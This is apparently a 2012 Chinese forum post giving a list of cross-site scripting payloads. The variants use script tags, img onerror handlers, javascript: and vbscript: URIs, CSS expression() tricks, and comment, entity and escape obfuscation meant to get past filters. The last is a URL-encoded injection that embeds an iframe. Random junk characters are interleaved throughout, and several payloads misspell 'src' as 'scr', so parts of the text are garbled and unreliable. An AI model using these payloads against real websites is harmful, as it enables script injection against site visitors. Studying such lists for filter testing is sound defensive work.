<script>alert("跨站")</script> (最常用). V- T, |' A1 o3 y1 b6 F/ z
<img scr=javascript:alert("跨站")></img>1 f' N3 U; _5 m3 C
<img scr="javascript: alert(/跨站/)></img>
# ~5 K5 i0 @8 T$ f+ g+ R+ N4 W<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
: \$ R, ?+ S2 ~+ m0 l1 X( y<img scr="#" onerror=alert(/跨站/)></img>2 G2 H5 j$ h4 w! o% z
<img scr="#" style="xss:expression(alert(/xss/));"></img>
% \/ Z8 q& X5 z- k O. n# C<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)$ ?: w- k, W3 Y/ Y+ |
<img src=vbscript:msgbox ("xss")></img>" ~+ {6 [& J. ?" p
<style> input {left:expression (alert('xss'))}</style>3 `% R6 ?) p* Q4 u, p, J
<div style={left:expression (alert('xss'))}></div>3 _& u% V7 o, ~9 r C0 J/ Y* v3 p
<div style={left:exp/* */ression (alert('xss'))}></div>
. p* K+ F4 B! W, D1 h" F<div style={left:\0065\0078ression (alert('xss'))}></div>
9 b* ?( z( b$ H" L; O5 M) Shtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>, @. C0 T0 P. }' A( T% D- X
unicode <div style="{left:expRessioN (alert('xss'))}">
7 [; G( }" X: c! R, }; j; x
" m! ~# D7 T6 v+ {"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
; k4 p6 A: @9 e. d |
发表于 2012-9-13 17:15:04
收藏
支持
反对